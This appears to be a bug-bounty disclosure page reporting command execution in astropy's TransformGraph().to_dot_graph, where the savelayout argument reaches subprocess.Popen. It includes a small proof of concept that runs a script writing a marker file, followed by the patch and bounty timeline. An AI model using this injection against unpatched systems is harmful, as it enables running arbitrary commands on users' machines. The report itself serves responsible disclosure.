RCE via TranformGraph().to_dot_graph function in astropy/astropy

Valid

Reported on

Aug 20th 2023


Description

Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen. Although an error will be raised, the command or script will be executed successfully.

Proof of Concept

$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>> 
$ cat /tmp/poc.txt
astrorce

Impact

A malicious user will we able to execute commands on the user's machine.

We are processing your report and will contact the astropy team within 24 hours. 6 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 6 months ago
astropy/astropy maintainer
6 months ago

A maintainer was notified. Waiting for a patch to be released.

astropy/astropy maintainer
5 months ago

Fixed with 53188c3. Patched versions 5.0.8 and 5.3.3 were released.

astropy/astropy maintainer
5 months ago

@admin can you confirm the fix ?

astropy/astropy maintainer
5 months ago

@admin i've asked the maintainer to confirm the fix using the link provided by this platform, but according to him he did not receive an email.

astropy/astropy maintainer
5 months ago

@admins

astropy/astropy maintainer modified the report
5 months ago
Ben Harvie
5 months ago

Admin


Hi u32i,

If you provide a link to this report to the maintainer, they will be able to see this report as long as they have write permissions to the astropy/astropy GitHub repository.

Thanks

We have contacted a member of the astropy team and are waiting to hear back 4 months ago
astropy/astropy maintainer gave praise 4 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
astropy/astropy maintainer validated this vulnerability 4 months ago
u32i has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
astropy/astropy maintainer marked this as fixed in 5.3.3 with commit 53188c 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation